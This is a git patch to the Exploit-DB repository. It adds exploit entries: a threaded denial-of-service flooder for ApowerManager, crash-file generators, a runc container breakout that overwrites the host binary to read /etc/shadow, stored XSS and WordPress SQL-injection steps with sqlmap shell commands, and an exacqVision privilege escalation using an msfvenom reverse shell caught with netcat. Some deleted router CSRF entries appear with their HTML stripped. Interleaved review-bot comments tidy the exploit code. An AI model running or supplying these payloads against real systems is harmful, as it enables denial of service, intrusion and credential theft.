From 5f3f5c8f0985317025d46b28d96c97a37f0ae540 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 15 Feb 2019 05:01:54 +0000 Subject: [PATCH] DB: 2019-02-15 18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin) --- exploits/android/dos/46380.py | 49 ++++++++++++++++ exploits/hardware/webapps/46363.txt | 33 ----------- exploits/hardware/webapps/46364.txt | 41 ------------- exploits/hardware/webapps/46365.txt | 90 ----------------------------- exploits/linux/local/46369.md | 81 ++++++++++++++++++++++++++ exploits/php/webapps/46372.txt | 16 +++++ exploits/php/webapps/46373.txt | 16 +++++ exploits/php/webapps/46374.txt | 16 +++++ exploits/php/webapps/46375.txt | 14 +++++ exploits/php/webapps/46376.txt | 15 +++++ exploits/php/webapps/46377.txt | 58 +++++++++++++++++++ exploits/php/webapps/46379.txt | 38 ++++++++++++ exploits/windows/dos/46371.py | 26 +++++++++ exploits/windows/dos/46378.py | 24 ++++++++ 
exploits/windows/local/46370.txt | 75 ++++++++++++++++++++++++ files_exploits.csv | 17 ++++-- 16 files changed, 441 insertions(+), 168 deletions(-) create mode 100755 exploits/android/dos/46380.py delete mode 100644 exploits/hardware/webapps/46363.txt delete mode 100644 exploits/hardware/webapps/46364.txt delete mode 100644 exploits/hardware/webapps/46365.txt create mode 100644 exploits/linux/local/46369.md create mode 100644 exploits/php/webapps/46372.txt create mode 100644 exploits/php/webapps/46373.txt create mode 100644 exploits/php/webapps/46374.txt create mode 100644 exploits/php/webapps/46375.txt create mode 100644 exploits/php/webapps/46376.txt create mode 100644 exploits/php/webapps/46377.txt create mode 100644 exploits/php/webapps/46379.txt create mode 100755 exploits/windows/dos/46371.py create mode 100755 exploits/windows/dos/46378.py create mode 100644 exploits/windows/local/46370.txt diff --git a/exploits/android/dos/46380.py b/exploits/android/dos/46380.py new file mode 100755 index 000000000..735b24dc7 --- /dev/null +++ b/exploits/android/dos/46380.py 
@@ -0,0 +1,49 @@
+#!/usr/bin/python
+#coding: utf-8
+
+# *********************************************************************
+# * Author: Marcelo Vázquez (aka s4vitar) *
+# * ApowerManager Remote Denial of Service (DoS) / Application Crash *
+# *********************************************************************
+
+# Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash
+# Date: 2019-02-14
+# Exploit Author: Marcelo Vázquez (aka s4vitar)
+# Vendor Homepage: https://www.apowersoft.com/phone-manager
+# Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/
+# Version: <= ApowerManager - Phone Manager 3.1.7
+# Tested on: Android
+
+import sys, requests, threading, signal
+
+def handler(signum, frame):
+ print '\nFinishing program...\n'
+ sys.exit(0)
+
+if len(sys.argv) != 3:
+ print "\nUsage: python " + sys.argv[0] + " \n"
+ print "Example: python apowermanager_dos.py 192.168.1.125 2333\n"
+ sys.exit(0)
+
+def startAttack(url):
+ url_destination = url + '/?Key=PhoneRequestAuthorization'
+ headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
+
+ r = requests.post(url_destination, headers=headers)
+
+if __name__ == '__main__':
+
+ signal.signal(signal.SIGINT, handler)
+ url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
+
+ threads = []
+
+ for i in xrange(0, 10000):
+ t = threading.Thread(target=startAttack, args=(url,))
+ threads.append(t)
+
+ for x in threads:
+ x.start()
+
+ for x in threads:
+ x.join()
\ No newline at end of file
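Review bot: The usage message on the line `print "\nUsage: python " + sys.argv[0] + " \n"` names no arguments, although the check above it requires exactly two and the example line passes a host and a port that the main block reads as `sys.argv[1]` and `sys.argv[2]`; the placeholders appear to have been lost (angle brackets stripped in rendering, presumably), so the line should read `print "\nUsage: python " + sys.argv[0] + " <host> <port>\n"`. In startAttack, `r = requests.post(url_destination, headers=headers)` binds a response that is never read; dropping the assignment makes it explicit that the response is discarded. The header lists only `Tested on: Android` while the code is Python 2 only (print statements, `xrange`) and depends on a third-party package, so a header line such as `# Requires: Python 2 with the third-party 'requests' package` would save a reader a failed run.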
diff --git a/exploits/hardware/webapps/46363.txt b/exploits/hardware/webapps/46363.txt deleted file mode 100644 index 6c03a845c..000000000 --- a/exploits/hardware/webapps/46363.txt +++ /dev/null @@ -1,33 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7687 - - -Description: -cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. - -1. Create a poc.html and insert - - - - -
- - - - -
- d - - -2. Send to victim(who is connected to the wifi network). -3. Post based Xss gets fired . - -Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC. \ No newline at end of file diff --git a/exploits/hardware/webapps/46364.txt b/exploits/hardware/webapps/46364.txt deleted file mode 100644 index adfb7c565..000000000 --- a/exploits/hardware/webapps/46364.txt +++ /dev/null @@ -1,41 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7745 - -Description: - -JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. - -POC- -1. Create a view.html and insert - - - - -
- - - - -
- - - - -2. Send to victim(who is connected to the wifi network). -3. The response gives the current wifi password. - Example response- - -{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID", -"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES", -"wpa_security_key":"leakedpassword",".....etc} - - -Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this. \ No newline at end of file diff --git a/exploits/hardware/webapps/46365.txt b/exploits/hardware/webapps/46365.txt deleted file mode 100644 index c056922a1..000000000 --- a/exploits/hardware/webapps/46365.txt +++ /dev/null @@ -1,90 +0,0 @@ -# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router -# Date: 12.02.2019 -# Exploit Author: Ronnie T Baby -# Contact:https://www.linkedin.com/in/ronnietbaby -# Vendor Homepage: www.jio.com -# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 -# Category: Hardware (Wifi Router) -# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 -# Tested on: Ubuntu 18.04 -# CVE: CVE-2019-7746 - -Description: - -JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset. - -POC- - -The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router. - -1. First get admin tokens - - - - -
- - -
- - - - - Example response- - -{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"} - -Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router. - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - -
- - - -Wifi Password changed to Iamhacked - -Choice B) Perform Remote Factory Reset - - - - -
- - - -
- - - -The router reboots to default settings. - - -Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this. \ No newline at end of file diff --git a/exploits/linux/local/46369.md b/exploits/linux/local/46369.md new file mode 100644 index 000000000..f1ed3cd1d --- /dev/null +++ b/exploits/linux/local/46369.md 
@@ -0,0 +1,81 @@ +## CVE-2019-5736 ## + +This is exploit code for CVE-2019-5736 (and it works for both runc and LXC). +The simplest way to use it is to copy the exploit code into an existing +container, and run `make.sh`. However, you could just as easily create a bad +image and run that. + +```console +% docker run --rm --name pwnme -dit ubuntu:18.10 bash +pwnme +% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar +``` + +We need to install `gcc` to build the exploit, and `runc` because we need to +have the shared libraries that `runc` would use. We don't actually use the +`runc` binary itself. For LXC, you would install `lxc` instead of `runc`. + +```console +% docker attach pwnme +# apt-get update && apt-get install -y gcc runc +[ snip ] +# tar xf CVE-2019-5736.tar +# ./CVE-2019-5736/make.sh +``` + +And now, `/bin/bash` in the container will be able to **overwrite the host runc +binary**. Since this binary is often executed by `root`, this allows for +root-level code execution on the host. + +``` +% docker exec -it pwnme /bin/bash +[+] bad_libseccomp.so booted. +[+] opened ro /proc/self/exe <3>. +[+] constructed fdpath +[+] bad_init is ready -- see for logs. +[*] dying to allow /proc/self/exe to be unused... +% cat /usr/sbin/docker-runc +#!/bin/bash +touch /w00t_w00t ; cat /etc/shadow +``` + +And now if you try to use Docker normally, the malicious script will execute +with root privileges: + +``` +% docker exec -it pwnme /bin/good_bash +OCI runtime state failed: invalid character 'b' looking for beginning of value: unknown +% file /w00t_w00t +/w00t_w00t: empty +``` + +And obviously `make.sh` can be modified to make the evil path anything you +like. If you want to get access to the container, use `/bin/good_bash`. + +### License ### + +``` +Copyright (C) 2019 Aleksa Sarai +Vulnerability discovered by Adam Iwaniuk and Borys Popławski. 
+ +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +* The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. +``` + + +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip \ No newline at end of file diff --git a/exploits/php/webapps/46372.txt b/exploits/php/webapps/46372.txt new file mode 100644 index 000000000..cd069545a --- /dev/null +++ b/exploits/php/webapps/46372.txt 
@@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20009 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/ssl-provider.php page and inject a javascript XSS payload +in ssl-provider-name, ssl-provider's-url "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46373.txt b/exploits/php/webapps/46373.txt new file mode 100644 index 000000000..6226c022e --- /dev/null +++ b/exploits/php/webapps/46373.txt @@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20010 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/ssl-provider-account.php page and inject a javascript XSS +payload in username field "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46374.txt b/exploits/php/webapps/46374.txt new file mode 100644 index 000000000..63dfa2da2 --- /dev/null +++ b/exploits/php/webapps/46374.txt 
@@ -0,0 +1,16 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-20011 + +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/add/category.php page and inject a javascript XSS payload in +CatagoryName, StakeHolder fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/88 \ No newline at end of file diff --git a/exploits/php/webapps/46375.txt b/exploits/php/webapps/46375.txt new file mode 100644 index 000000000..d046610e3 --- /dev/null +++ b/exploits/php/webapps/46375.txt @@ -0,0 +1,14 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Raheem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-19914 +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the + /assets/add/dns.php page and inject a javascript XSS payload in +Profile Name & notes fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/87 \ No newline at end of file diff --git a/exploits/php/webapps/46376.txt b/exploits/php/webapps/46376.txt new file mode 100644 index 000000000..017edd3fd --- /dev/null +++ b/exploits/php/webapps/46376.txt 
@@ -0,0 +1,15 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-22 +# Exploit Author: Mohammed Abdul Kareem +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/DomainMod/DomainMod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-19915 +# A Stored Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01 +# After logging into the Domainmod application panel, browse to the +/assets/edit/host.php?whid=5 page and inject a javascript XSS payload +in "Web Host Name" & "Web Host's url fields "> + +#POC : attached here https://github.com/domainmod/domainmod/issues/87 \ No newline at end of file diff --git a/exploits/php/webapps/46377.txt b/exploits/php/webapps/46377.txt new file mode 100644 index 000000000..7b37b452e --- /dev/null +++ b/exploits/php/webapps/46377.txt 
@@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability +# Date: 2018-12-28 +# Exploit Author: B0UG +# Vendor Homepage: https://wpbookingcalendar.com/ +# Software Link: https://wordpress.org/plugins/booking/ +# Version: Tested on version 8.4.3 (older versions may also be affected) +# Tested on: WordPress +# Category : Webapps +# CVE: CVE-2018-20556 + +#I. VULNERABILITY + +Authenticated SQL Injection + +#II. BACKGROUND +'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations. + +#III. DESCRIPTION +An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. + +#IV. PROOF OF CONCEPT +1) Access WordPress control panel. +2) Navigate to the Booking Calendar plugin page. +3) Set up Burp Suite to capture the traffic. +4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry. +5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'. +6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: +• Boolean based blind injection +• Error based injection +• Time based injection + +7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below. +action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67 + +Obtaining a shell using sqlmap +----------------------- +• Obtain a SQL Shell +Sqlmap –r post-request.txt –p booking_id --sql-shell + +• Obtain a Linux Shell +Sqlmap –r post-request.txt –p booking_id --os-shell + +• Obtain a Windows Command Prompt +Sqlmap –r post-request.txt –p booking_id --os-cmd + +#V. 
IMPACT +The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability. + +#VI. SYSTEMS AFFECTED +WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected). + +#VII. REMEDIATION +Uninstall the plugin until the vulnerability has been fixed by the developer. + +#VIII. DISCLOSURE TIMELINE +#December 28, 2018 1: Vulnerability identified. +#December 28, 2018 2: Informed developer of the vulnerability. +#February 14, 2019 3: No communication received back from the developer. \ No newline at end of file diff --git a/exploits/php/webapps/46379.txt b/exploits/php/webapps/46379.txt new file mode 100644 index 000000000..032f7ed16 --- /dev/null +++ b/exploits/php/webapps/46379.txt @@ -0,0 +1,38 @@ +# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery +# Date: 10/4/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://forum.layerbb.com +# Version: 1.1.2 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-17996 + + +1. Description: +LayerBB is a free open-source forum software, the CSRF allows creating a admin user. + + +2. Proof of Concept: + + + + +
+ + + + + + +
+

+ +
+ + + + + +3. Solution: +Update to 1.1.3 \ No newline at end of file diff --git a/exploits/windows/dos/46371.py b/exploits/windows/dos/46371.py new file mode 100755 index 000000000..3a73779f7 --- /dev/null +++ b/exploits/windows/dos/46371.py @@ -0,0 +1,26 @@ +#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-02-13 +#Vendor Homepage: http://www.coreftp.com/ +#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe +#Tested Version: v2-Build 673 +#Tested on: Windows 7 Service Pack 1 x32 + +#Steps to produce the crash: +#1.- Run python code: Core_FTP_SFTP_Server_1.2.py +#2.- Open core_code.txt and copy content to clipboard +#3.- Open Core FTP Server +#4.- Select "Setup" > "New" +#5.- Select "Domain Name" and Put "Test" +#6.- Select "Domain IP/Address" and Put "1.1.1.1" +#7.- Select "Base directory" and Choose a directory path +#8.- Enable "WinNT users" +#9.- Select "User domain" and Paste Clipboard +#10.- Click on "Ok" and the next window click "Ok" +#11.- Crashed + +cod = "\x41" * 7000 + +f = open('core_code.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46378.py b/exploits/windows/dos/46378.py new file mode 100755 index 000000000..871bab660 --- /dev/null +++ b/exploits/windows/dos/46378.py 
@@ -0,0 +1,24 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: MediaMonkey 4.1.23 - URL Denial of Service (PoC)
+# Date: 13/02/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.mediamonkey.com/
+# Software Link: https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe
+# Version: 4.1.23.1881
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "MediaMonkey.py", it will create a new file "PoC.mp3"
+# 2.- Open MediaMonkey.exe
+# 3.- Go to File > Open URL or File...
+# 4.- Click on button -> Browse... and select the 'PoC.mp3' file created
+# 5.- Crashed
+
+buffer = "http://127.0.0.1/"
+badstr = "\x41" * 4000
+buffer += badstr
+buffer += ".mp3"
+
+f = open ("PoC.mp3", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46370.txt b/exploits/windows/local/46370.txt
new file mode 100644
index 000000000..c1fec8321
--- /dev/null
+++ b/exploits/windows/local/46370.txt
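Review bot: `buffer` on the line `buffer = "http://127.0.0.1/"` shadows the Python 2 builtin of the same name, and the file declares no interpreter version; a neutral name such as `payload` avoids the collision under either interpreter. The write block `f = open ("PoC.mp3", "w")` / `f.write(buffer)` / `f.close()` would be more idiomatic as `with open("PoC.mp3", "w") as f: f.write(buffer)`, which also removes the stray space before the parenthesis. Step 1 of the proof-of-concept comment names the script `MediaMonkey.py` while it is committed as `46378.py`; `# 1.- Run this script, it will create a new file "PoC.mp3"` keeps the comment true after the rename.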
@@ -0,0 +1,75 @@ +# Exploit Title: exacqVision ESM 5.12.2 - Privilege Escalation +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 2019-02-13 +# Vulnerable Software: +# http://cdnpublic.exacq.com/5.12/exacqVisionEnterpriseSystemManager_5.12.2.150128_x86.exe +# Vendor Homepage: https://www.exacq.com +# Version: 5.12.2.150128 +# Tested Windows 7 SP1 x86 and Windows 10 x64 + +# Description: +# exacqVision ESM 5.12.2 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the enterprisesystemmanager.exe file located in +# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service +# through the application, a restart of the computer triggers the execution of the malicious file. + +# note: during install, you cannot choose a folder containing spaces i.e. 
"program files" + +C:\>icacls exacqVisionEsm +exacqVisionEsm NT AUTHORITY\NETWORK SERVICE:(RX) + win7-32bit\bob:(RX) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) + +Successfully processed 1 files; Failed processing 0 files + + +C:\>sc qc "exacqVision Enterprise System Manager Web Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: exacqVision Enterprise System Manager Web Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ESMWebService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# Proof of Concept +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -nlvvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.0.163/enterprisesystemmanager.exe and download + +4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe + enterprisesystemmanager.exe > enterprisesystemmanager.bak + +5. Copy/Move downloaded enterprisesystemmanager.exe file to C:\exacqVisionEsm\EnterpriseSystemManager\ + +6. Restart victim machine and login as low privileged user + +7. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 201b7f482..65deb8a42 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6307,6 +6307,9 @@ id,file,description,date,author,type,platform,port
 46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
 46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
+46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
+46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
+46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10294,9 +10297,11 @@ id,file,description,date,author,type,platform,port
 46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
 46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
 46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows,
-46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
+46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)",2019-02-12,feexd,local,linux,
 46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux,
 46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
+46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
+46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40819,8 +40824,6 @@ id,file,description,date,author,type,platform,port
 46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
 46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
 46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
-46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80
